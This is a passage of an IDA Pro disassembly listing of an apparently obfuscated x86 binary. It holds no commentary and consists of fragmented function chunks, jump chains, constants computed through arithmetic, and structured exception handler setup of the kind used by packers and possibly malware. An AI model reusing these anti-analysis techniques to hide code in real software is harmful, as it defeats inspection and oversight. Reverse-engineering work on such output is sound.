		pop	edx
; START	OF FUNCTION CHUNK FOR sub_44BDBB

loc_441A47:				; CODE XREF: sub_44BDBB:loc_44351Dj
					; sub_44BDBB+Ej
		jz	loc_458F65
		ror	eax, 17h
		push	ebx
		push	9853D95Dh
		pop	ebx
		jmp	loc_4443FC
; END OF FUNCTION CHUNK	FOR sub_44BDBB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457DCA

loc_441A5C:				; CODE XREF: sub_457DCA-FF6Cj
		cmp	esi, ebx
		jmp	loc_4447B5
; END OF FUNCTION CHUNK	FOR sub_457DCA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4468FE

loc_441A63:				; CODE XREF: sub_4468FE:loc_44C673j
		test	ecx, esi
		jmp	loc_4477E9
; END OF FUNCTION CHUNK	FOR sub_4468FE
; ---------------------------------------------------------------------------
		mov	ebp, 34C066DBh
		jmp	sub_445F6E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44083C

loc_441A74:				; CODE XREF: sub_44083C+C0C0j
		push	offset loc_449E3B
		jmp	nullsub_200
; END OF FUNCTION CHUNK	FOR sub_44083C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440B4F

loc_441A7E:				; CODE XREF: sub_440B4F:loc_4431DBj
		mov	edx, [esp-4+arg_0]
		push	eax
		mov	eax, edx

loc_441A84:				; CODE XREF: sub_444A97+3j
		call	sub_445047
		mov	eax, [esp+0]
		jmp	loc_4506A5
; END OF FUNCTION CHUNK	FOR sub_440B4F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440C7D

loc_441A91:				; CODE XREF: sub_440C7D+12j
		xchg	edi, [esp+0]
		push	0B01F605h
		pop	ebx
		or	ebx, 191166E2h
		jmp	loc_440776
; END OF FUNCTION CHUNK	FOR sub_440C7D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44471B

loc_441AA5:				; CODE XREF: sub_44471B+5F4Aj
		mov	eax, [ebp+8]
		cmp	dword ptr [eax-4], 4
		jnz	loc_440712
		add	dword ptr [ebp-8], 4
		jmp	loc_458062
; END OF FUNCTION CHUNK	FOR sub_44471B
; ---------------------------------------------------------------------------
		xor	esi, 0AF7C84EEh
		shr	ecx, 8
		jmp	sub_44AA92
; ---------------------------------------------------------------------------

loc_441AC9:				; DATA XREF: sub_43FA2C:loc_440907o
		call	sub_45B20A
		push	eax
		ror	eax, 14h

loc_441AD2:				; CODE XREF: k2vbe3.d:00449130j
		mov	ds:dword_453CF0, eax
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FA2C

loc_441AD9:				; CODE XREF: sub_43FA2C+40F6j
					; sub_45A323-9022j
		rol	eax, 14h
		push	eax
		push	eax
		jmp	loc_45BC73
; END OF FUNCTION CHUNK	FOR sub_43FA2C

; =============== S U B	R O U T	I N E =======================================



sub_441AE3	proc near		; CODE XREF: k2vbe3.d:0044B224j
					; sub_45C27A+6p

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8
arg_8		= dword	ptr  0Ch

; FUNCTION CHUNK AT 00443C40 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 004490FB SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044DA65 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00458EC1 SIZE 00000016 BYTES

		xchg	eax, [esp+0]
		pop	eax
		xchg	esi, [esp-4+arg_0]
		mov	ebx, esi
		pop	esi
		or	ebx, 4FADB1A2h
		jnz	loc_4490FB

loc_441AF9:				; CODE XREF: k2vbe3.d:00452E7Aj
		jmp	sub_4440B5
sub_441AE3	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		shl	ebx, 12h
		jmp	loc_4490EB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4479A1

loc_441B06:				; CODE XREF: sub_4479A1:loc_458EBCj
		push	0C471BD00h
		pop	eax
		or	eax, 2F1DFC10h
		xor	eax, 32ACD298h
		and	eax, 19EA5758h
		xor	eax, 19C00708h
		jmp	loc_454E7E
; END OF FUNCTION CHUNK	FOR sub_4479A1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4481FA

loc_441B29:				; CODE XREF: sub_4481FA+9C24j
		mov	[edx], esi

loc_441B2B:				; CODE XREF: sub_4481FA:loc_44B906j
		mov	eax, 0CF0182F6h
		call	sub_4553CC
		xor	eax, 0D336177h
		rol	eax, 13h
		push	esi
		jmp	loc_443610
; END OF FUNCTION CHUNK	FOR sub_4481FA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4582DD

loc_441B44:				; CODE XREF: sub_4582DD:loc_4558E3j
		jnz	loc_45AB02
		jmp	loc_4599A5
; END OF FUNCTION CHUNK	FOR sub_4582DD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C90E

loc_441B4F:				; CODE XREF: sub_44C90E-2DFDj
		jnz	loc_45B8E1
		jmp	loc_457C03
; END OF FUNCTION CHUNK	FOR sub_44C90E
; ---------------------------------------------------------------------------

loc_441B5A:				; CODE XREF: k2vbe3.d:004465D4j
		jle	loc_45B80D
		rol	edi, 1Dh
; START	OF FUNCTION CHUNK FOR sub_454E69

loc_441B63:				; CODE XREF: sub_454E69:loc_450EACj
		add	edi, 4CB3697Fh
		test	edi, 4000h
		jmp	loc_44DA80
; END OF FUNCTION CHUNK	FOR sub_454E69
; ---------------------------------------------------------------------------
		jmp	ds:off_41E018
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B20A

loc_441B7A:				; CODE XREF: sub_4580DF-1C07Dj
					; k2vbe3.d:loc_449800j	...
		jnz	loc_44E2F3
		call	sub_448472

loc_441B85:				; CODE XREF: k2vbe3.d:00441686j
		mov	[eax], ebp
		test	edi, ebp
		jmp	loc_44974D
; END OF FUNCTION CHUNK	FOR sub_45B20A
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_193. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E282

loc_441B8F:				; CODE XREF: sub_43E282:loc_455D1Bj
		xchg	esi, [esp+4+var_4]
		mov	ebp, esp
		push	eax
		mov	eax, ecx
		xchg	eax, [esp+8+var_8]
		mov	esp, ebp
		pop	ebp
		mov	eax, ds:dword_458BF0
		jmp	loc_45B24D
; END OF FUNCTION CHUNK	FOR sub_43E282
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445124

loc_441BA8:				; CODE XREF: sub_445124:loc_44126Bj
		jz	loc_4540FD
; END OF FUNCTION CHUNK	FOR sub_445124
; START	OF FUNCTION CHUNK FOR sub_444966

loc_441BAE:				; CODE XREF: sub_444966-3A15j
		jmp	loc_4590ED
; END OF FUNCTION CHUNK	FOR sub_444966
; ---------------------------------------------------------------------------
		xor	eax, esi
		xor	edi, edx
		rol	edx, 0Eh
		jmp	loc_4540FD
; ---------------------------------------------------------------------------

loc_441BBF:				; CODE XREF: k2vbe3.d:loc_44FF88j
		jz	loc_44366D
		sub	al, 99h
		mov	edx, [ebp-4]
		imul	byte ptr [edx]
		cmp	al, 0A4h
		jz	loc_44C9FA
		jmp	loc_4404C5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D0D5

loc_441BD9:				; CODE XREF: sub_44D0D5:loc_451356j
		pop	edx
		and	edx, 0EE553A97h
		xor	edx, 0A7ABD6F3h

loc_441BE6:				; CODE XREF: sub_44B2D7:loc_44EEA1j
		add	eax, edx
		pop	edx
		jmp	loc_45464D
; END OF FUNCTION CHUNK	FOR sub_44D0D5
; ---------------------------------------------------------------------------

loc_441BEE:				; CODE XREF: k2vbe3.d:0044ABB6j
		js	loc_44C803

; =============== S U B	R O U T	I N E =======================================



sub_441BF4	proc near		; CODE XREF: sub_45649E-19C10p

; FUNCTION CHUNK AT 00454AED SIZE 0000000A BYTES

		xchg	esi, [esp+0]
		pop	esi
		or	eax, edx
		mov	edx, [ebp+8]
		mov	[edx-8], eax

loc_441C00:				; CODE XREF: k2vbe3.d:0043D773j
					; sub_44A1B1:loc_445E5Ej ...
		mov	eax, [ebp-4]
		jmp	loc_454AED
sub_441BF4	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		test	ecx, 0DCC317D8h
		jmp	loc_43D01D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440621

loc_441C13:				; CODE XREF: sub_440621:loc_45A171j
		jnz	loc_443261
		jmp	loc_446BAF
; END OF FUNCTION CHUNK	FOR sub_440621
; ---------------------------------------------------------------------------

loc_441C1E:				; CODE XREF: k2vbe3.d:loc_44023Dj
		jnz	loc_44F402

; =============== S U B	R O U T	I N E =======================================



sub_441C24	proc near		; CODE XREF: sub_45A323-16096p

; FUNCTION CHUNK AT 004505C6 SIZE 0000000B BYTES

		xchg	edi, [esp+0]
		pop	edi
		add	eax, 704223EBh
		mov	eax, [eax]
		xor	edx, edx
		div	dword ptr [ebp-8]
		jmp	loc_4505C6
sub_441C24	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444D7B

loc_441C3A:				; CODE XREF: sub_444D7B:loc_45B128j
		jnz	loc_447D4A

loc_441C40:				; CODE XREF: sub_454CAC+767Aj
		jmp	nullsub_407
; END OF FUNCTION CHUNK	FOR sub_444D7B
; ---------------------------------------------------------------------------

loc_441C45:				; CODE XREF: k2vbe3.d:0044AFCFj
		jmp	sub_445024
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446E1E

loc_441C4A:				; CODE XREF: sub_446E1E+155Dj
		jmp	nullsub_47
; END OF FUNCTION CHUNK	FOR sub_446E1E
; ---------------------------------------------------------------------------
		cmp	edi, 0A0EF79DCh
		jmp	loc_455CED
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447664

loc_441C5A:				; CODE XREF: sub_447664:loc_43ED67j
		mov	eax, [esp+0]
		push	edx
		call	sub_44660F
		push	0EAF8E2C4h
		xchg	ebp, [esp+8+var_8]
		mov	eax, ebp
		jmp	loc_454402
; END OF FUNCTION CHUNK	FOR sub_447664
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C9DC

loc_441C72:				; CODE XREF: sub_44C9DC+12j
		mov	eax, [esp+0]
		call	sub_453347
		retn
; END OF FUNCTION CHUNK	FOR sub_44C9DC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D0D5

loc_441C7B:				; CODE XREF: sub_44D0D5+2265j
		jmp	loc_4460E5
; END OF FUNCTION CHUNK	FOR sub_44D0D5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455500

loc_441C80:				; CODE XREF: sub_455500+Bj
		xor	eax, 5FBA6BA4h
		jmp	loc_442CFA
; END OF FUNCTION CHUNK	FOR sub_455500
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B4A2

loc_441C8B:				; CODE XREF: sub_45B4A2-111C8j
		sbb	eax, 0F985F7E0h

loc_441C91:				; CODE XREF: sub_45B4A2:loc_43C55Dj
		push	eax
		call	sub_44533A
; END OF FUNCTION CHUNK	FOR sub_45B4A2
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_67. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455A4F

loc_441C98:				; CODE XREF: sub_455A4F-14E2j
		jmp	nullsub_236
; END OF FUNCTION CHUNK	FOR sub_455A4F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A323

loc_441C9D:				; CODE XREF: sub_45A323-17D95j
		jmp	loc_44E4C2
; END OF FUNCTION CHUNK	FOR sub_45A323
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44469A

loc_441CA2:				; CODE XREF: sub_44469A:loc_452F1Cj
		jz	loc_45576E

loc_441CA8:				; CODE XREF: k2vbe3.d:00449D5Aj
		jmp	loc_44FDC2
; END OF FUNCTION CHUNK	FOR sub_44469A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C90E

loc_441CAD:				; CODE XREF: sub_44C90E-69A5j
		jmp	loc_4513CF
; END OF FUNCTION CHUNK	FOR sub_44C90E
; ---------------------------------------------------------------------------

loc_441CB2:				; CODE XREF: k2vbe3.d:0044AF18j
		xor	ecx, 0AA62270Dh
		jbe	loc_45B371
		jns	loc_44180C
		sbb	edx, 8D62F54Bh
		jmp	loc_45576E
; ---------------------------------------------------------------------------
		mov	edx, 0CB39536Bh
		call	sub_45B20A
		mov	[ebp-4], eax
		cmp	dword ptr [ebp-4], 0
		jz	loc_4486CE
		jmp	loc_44D2DB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4467A1

loc_441CEB:				; CODE XREF: sub_4467A1-A0CFj
		push	ecx

loc_441CEC:				; CODE XREF: sub_4467A1:loc_43D33Fj
		call	sub_457B49
		push	1D46708Bh
		pop	eax
		or	eax, ds:4000F2h
		add	eax, 30379797h
		xor	eax, 577A594Dh
		and	eax, 8B563219h
		add	eax, 0EF69A1F1h
		push	esi
		jmp	loc_43F022
; END OF FUNCTION CHUNK	FOR sub_4467A1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F34C

loc_441D1B:				; CODE XREF: sub_43F34C+A6E7j
		sub	ecx, ebx
		test	ebp, 0A7B7B81Ah
		jmp	loc_4400C9
; END OF FUNCTION CHUNK	FOR sub_43F34C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A4C1

loc_441D28:				; CODE XREF: sub_45A4C1:loc_45BC15j
		movzx	edx, byte ptr [ecx+edx]
		and	eax, edx
		jz	loc_449C0B
		jmp	loc_45000A
; END OF FUNCTION CHUNK	FOR sub_45A4C1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E360

loc_441D39:				; CODE XREF: sub_43E360:loc_45C1B5j
		call	sub_4570C0
		xor	eax, eax
		retn
; END OF FUNCTION CHUNK	FOR sub_43E360

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_441D41	proc near		; DATA XREF: sub_455B26-1617Co

; FUNCTION CHUNK AT 0043CDA6 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0043DD83 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0043E233 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043EF09 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043EF93 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00441369 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004413C5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044242B SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00448BEE SIZE 00000026 BYTES
; FUNCTION CHUNK AT 0044AD3F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044B76D SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0044F500 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044F99F SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0045638C SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0045696D SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00457E92 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00459784 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0045BC68 SIZE 0000000B BYTES

		push	ebp
		mov	ebp, esp
		jmp	loc_43EF09
sub_441D41	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449372

loc_441D49:				; CODE XREF: sub_449372-A79Aj
		xchg	edi, ebp
		test	edi, ebx
		jmp	loc_43F097
; END OF FUNCTION CHUNK	FOR sub_449372

; =============== S U B	R O U T	I N E =======================================



sub_441D52	proc near		; DATA XREF: sub_44CD78+Do
		add	ebx, 656746F3h
		xchg	ebx, [esp+0]
		jmp	sub_45B74D
sub_441D52	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448159

loc_441D60:				; CODE XREF: sub_448159:loc_4526EFj
		pop	edx
		or	edx, 8854183Fh
		xor	edx, 0F7C34FBAh
		add	edx, 83CED2DEh
		jmp	loc_43F394
; END OF FUNCTION CHUNK	FOR sub_448159
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B94B

loc_441D78:				; CODE XREF: sub_44B94B:loc_44F4EEj
		mov	edx, [esi]
		xchg	ebx, ecx
		jmp	loc_45B235
; END OF FUNCTION CHUNK	FOR sub_44B94B
; ---------------------------------------------------------------------------

loc_441D81:				; CODE XREF: k2vbe3.d:loc_452A02j
		push	edx
		push	6349BB23h
		pop	edx
		and	edx, ds:4000EEh
		rol	edx, 0Ch
		jmp	loc_452F83
; ---------------------------------------------------------------------------

loc_441D96:				; DATA XREF: k2vbe3.d:0045A82Co
		push	0BB9EC1CDh
; START	OF FUNCTION CHUNK FOR sub_446CE6

loc_441D9B:				; CODE XREF: sub_446CE6:loc_43FBA9j
		xchg	ebp, [esp+4+var_4]
		mov	esi, ebp
		pop	ebp
		xor	esi, 16848562h
		rol	esi, 0Dh
		jmp	loc_44ACBB
; END OF FUNCTION CHUNK	FOR sub_446CE6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451222

loc_441DAF:				; CODE XREF: sub_451222+5FA1j
		push	0C0512356h
		pop	edi

loc_441DB5:				; CODE XREF: sub_4580DF:loc_454BA5j
		rol	edi, 14h
		xor	edi, 8AA7BE2Ch
		rol	edi, 10h
		add	edi, 0A95C62E0h
		jmp	loc_43C533
; END OF FUNCTION CHUNK	FOR sub_451222

; =============== S U B	R O U T	I N E =======================================



sub_441DCC	proc near		; CODE XREF: k2vbe3.d:004403BDj
					; k2vbe3.d:00448F94p

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043D9F1 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0043FF44 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 004407CC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00443B8D SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00446C64 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004491B8 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0045187E SIZE 00000005 BYTES

		xchg	edx, [esp-4+arg_0]
		pop	edx
		push	edx
		call	sub_44F49C
		mov	eax, 19CFC62Bh
		push	edx
		jmp	loc_4407CC
sub_441DCC	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_441DE1:				; DATA XREF: k2vbe3.d:004419D8o
		mov	eax, [ebp-8]
		shl	eax, 0Ah
		add	[ebp-8], eax
		mov	eax, [ebp-8]
		shr	eax, 6
		xor	[ebp-8], eax
		inc	dword ptr [ebp-0Ch]
		jmp	loc_452A51
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FE0A

loc_441DFB:				; CODE XREF: sub_43FE0A-3A0Fj
					; sub_43FE0A+17D71j
		inc	dword ptr [ebp-8]
		jmp	loc_4436C6
; END OF FUNCTION CHUNK	FOR sub_43FE0A
; ---------------------------------------------------------------------------

loc_441E03:				; CODE XREF: k2vbe3.d:00456AAFj
		popf
		mov	al, [eax]
		jnb	loc_44C534
		push	offset sub_458B9B
		jmp	loc_44FBA8
; ---------------------------------------------------------------------------

loc_441E16:				; CODE XREF: k2vbe3.d:loc_45A099j
		mov	[ebx], eax
		pop	ebx
		call	sub_447CC0

loc_441E1E:				; CODE XREF: k2vbe3.d:00451D70j
		jmp	loc_452F21
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454AD4

loc_441E23:				; CODE XREF: sub_454AD4-9EF0j
		jmp	loc_440B00
; END OF FUNCTION CHUNK	FOR sub_454AD4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457DCA

loc_441E28:				; CODE XREF: sub_457DCA:loc_453C8Bj
		inc	dword ptr [ebp-108h]
		inc	dword ptr [ebp-104h]
		jmp	loc_43D902
; END OF FUNCTION CHUNK	FOR sub_457DCA

; =============== S U B	R O U T	I N E =======================================



sub_441E39	proc near		; CODE XREF: sub_43CF52+4p

; FUNCTION CHUNK AT 0043CA0A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044B379 SIZE 0000000F BYTES

		push	large dword ptr	fs:0
		mov	large fs:0, esp
		jmp	loc_43CA0A
sub_441E39	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FE0A

loc_441E4C:				; CODE XREF: sub_43FE0A+12531j
		mov	eax, [ebp-8]
		push	offset sub_4410AE
		jmp	loc_43CE0F
; END OF FUNCTION CHUNK	FOR sub_43FE0A

; =============== S U B	R O U T	I N E =======================================



sub_441E59	proc near		; DATA XREF: sub_45A323-153A1o
		mov	[ebp-4], eax
sub_441E59	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_450F71

loc_441E5C:				; CODE XREF: sub_450F71:loc_45369Bj
		call	sub_444966
; END OF FUNCTION CHUNK	FOR sub_450F71
; START	OF FUNCTION CHUNK FOR sub_43E204

loc_441E61:				; CODE XREF: sub_43E204+2B3Cj
		jmp	nullsub_71
; END OF FUNCTION CHUNK	FOR sub_43E204

; =============== S U B	R O U T	I N E =======================================



sub_441E66	proc near		; CODE XREF: sub_44E90D:loc_4445D3p
					; k2vbe3.d:0044FCE0j

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0045037C SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00451E5A SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00453052 SIZE 0000001A BYTES

		xchg	edx, [esp+0]
		pop	edx
		push	0AF16125Eh
		xchg	ecx, [esp+0]
		mov	esi, ecx
		add	ecx, edi
		jmp	loc_451E5A
sub_441E66	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_441E7B:				; CODE XREF: k2vbe3.d:0043D8E1j
		call	sub_455E32
; START	OF FUNCTION CHUNK FOR sub_459216

loc_441E80:				; CODE XREF: sub_459216-5841j
		jmp	loc_4475E1
; END OF FUNCTION CHUNK	FOR sub_459216
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4574AE

loc_441E85:				; CODE XREF: sub_4574AE+4j
		cmp	ds:dword_441210, 0
		push	offset loc_45A132

loc_441E91:				; CODE XREF: sub_453347-9D48j
		jmp	loc_446E91
; END OF FUNCTION CHUNK	FOR sub_4574AE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44921C

loc_441E96:				; CODE XREF: sub_44921C-A8Aj
		mov	eax, [ebp-24h]
		mov	al, [eax]
		call	sub_44921C

loc_441EA0:				; CODE XREF: k2vbe3.d:004469AAj
		jmp	loc_43D94E
; END OF FUNCTION CHUNK	FOR sub_44921C
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_146. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_441EA6:				; CODE XREF: k2vbe3.d:00455C5Ej
		jmp	loc_44D808
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B359

loc_441EAB:				; CODE XREF: sub_44B359-ED78j
		jmp	loc_451B96
; END OF FUNCTION CHUNK	FOR sub_44B359
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A0D7

loc_441EB0:				; CODE XREF: sub_44A0D7+F462j
		pop	ebp
		jmp	loc_43FC8A
; END OF FUNCTION CHUNK	FOR sub_44A0D7
; ---------------------------------------------------------------------------
		rol	ebp, 0Ah
		jmp	loc_4560FE

; =============== S U B	R O U T	I N E =======================================



sub_441EBE	proc near		; CODE XREF: sub_4432B0p
					; k2vbe3.d:0044C742j

; FUNCTION CHUNK AT 00443215 SIZE 00000005 BYTES

		xchg	esi, [esp+0]
		pop	esi
		push	ebp
		mov	ebp, esp
		jnz	sub_44D3A3
		jmp	loc_443215
sub_441EBE	endp

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_512. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_441ED1:				; CODE XREF: k2vbe3.d:0045BE57j
		jmp	loc_458FA4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B94B

loc_441ED6:				; CODE XREF: sub_44B94B+34A1j
		jmp	nullsub_415
; END OF FUNCTION CHUNK	FOR sub_44B94B
; ---------------------------------------------------------------------------

loc_441EDB:				; CODE XREF: k2vbe3.d:0043D002j
		jmp	loc_459063
; ---------------------------------------------------------------------------
		sbb	eax, ecx
		jmp	sub_448D9B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449661

loc_441EE7:				; CODE XREF: sub_449661:loc_43EA3Ej
		call	sub_4553CC
		mov	ds:off_41E154, eax
		lea	eax, sub_4440E5
		call	sub_447D8B

loc_441EFD:				; CODE XREF: k2vbe3.d:0045BCBEj
		jmp	loc_43CA7F
; END OF FUNCTION CHUNK	FOR sub_449661

; =============== S U B	R O U T	I N E =======================================



sub_441F02	proc near		; DATA XREF: sub_444966+14796o
		add	ecx, 3E0F110Fh
		call	sub_456208
sub_441F02	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_44F20A

loc_441F0D:				; CODE XREF: sub_44F20A+C9Fj
		jmp	loc_44D05C
; END OF FUNCTION CHUNK	FOR sub_44F20A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FECA

loc_441F12:				; CODE XREF: sub_43FECA-20Dj
		jmp	loc_452777
; END OF FUNCTION CHUNK	FOR sub_43FECA
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_460. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DD31

loc_441F18:				; CODE XREF: sub_44DD31-A8D0j
		and	edx, 3DD0B708h
		jnz	loc_44E673
		shl	edx, 9
		add	ebp, edi
		adc	edx, 1D4B5A74h
		sub	ebp, edi
		adc	edi, 7CBF0DD5h
		jmp	loc_44E673
; END OF FUNCTION CHUNK	FOR sub_44DD31
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4530B2

loc_441F3C:				; CODE XREF: sub_4530B2:loc_43E871j
		and	ebx, 6A175B9Bh
		add	ebx, 0E03E5B81h
		xchg	ebx, [esp+4+var_4]
		jmp	sub_4553CC
; END OF FUNCTION CHUNK	FOR sub_4530B2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45282D

loc_441F50:				; CODE XREF: sub_45282D-76F6j
		jl	loc_456531
; END OF FUNCTION CHUNK	FOR sub_45282D

; =============== S U B	R O U T	I N E =======================================



sub_441F56	proc near		; CODE XREF: sub_45282D:loc_452E49j

; FUNCTION CHUNK AT 004558F3 SIZE 00000005 BYTES

		push	ebp
		mov	ebp, esi
		push	offset sub_45A634
		jmp	loc_4558F3
sub_441F56	endp

; ---------------------------------------------------------------------------

loc_441F63:				; DATA XREF: sub_446258-5FBCo
		push	esi
		push	0C6C1D87Fh
		xchg	ebx, [esp]
		mov	esi, ebx
		pop	ebx
		or	esi, 76AF8602h
		test	esi, 40h
		jmp	loc_454F07
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44FF97

loc_441F80:				; CODE XREF: sub_44FF97:loc_453AF4j
		jz	loc_444762
		jmp	loc_4497AB
; END OF FUNCTION CHUNK	FOR sub_44FF97
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453AE8

loc_441F8B:				; CODE XREF: sub_453AE8+186Aj
		sbb	ecx, esi
		jp	sub_44F817
; END OF FUNCTION CHUNK	FOR sub_453AE8
; START	OF FUNCTION CHUNK FOR sub_443BDF

loc_441F93:				; CODE XREF: sub_453AE8:loc_43C72Dj
					; sub_443BDF:loc_4416B1j ...
		jmp	loc_44BAF3
; END OF FUNCTION CHUNK	FOR sub_443BDF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45812F

loc_441F98:				; CODE XREF: sub_443BDF+3j
					; sub_45812F+13j
		pop	ecx
		push	offset loc_444B37
		jmp	loc_44DFD6
; END OF FUNCTION CHUNK	FOR sub_45812F
; ---------------------------------------------------------------------------

loc_441FA3:				; CODE XREF: k2vbe3.d:loc_44A266j
		or	ebx, edi
		js	loc_456521
		pop	ecx
		sbb	edx, esi
		adc	esi, 32533ABEh
		jmp	loc_4460AC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4467A1

loc_441FB9:				; CODE XREF: sub_4467A1+10758j
		jz	loc_44E3D1
		jmp	loc_458370
; END OF FUNCTION CHUNK	FOR sub_4467A1
; ---------------------------------------------------------------------------
		rol	ebp, 17h
		jmp	sub_44E360

; =============== S U B	R O U T	I N E =======================================



sub_441FCC	proc near		; CODE XREF: sub_40C517+2A6p
					; sub_40C517+318p ...
		call	sub_441FEB
		jmp	ds:off_41E12C
sub_441FCC	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455F6B

loc_441FD7:				; CODE XREF: sub_455F6B+5829j
		jmp	loc_45705D
; END OF FUNCTION CHUNK	FOR sub_455F6B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D85C

loc_441FDC:				; CODE XREF: sub_43D85C+19B3Ej
		jmp	nullsub_323
; END OF FUNCTION CHUNK	FOR sub_43D85C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FE0A

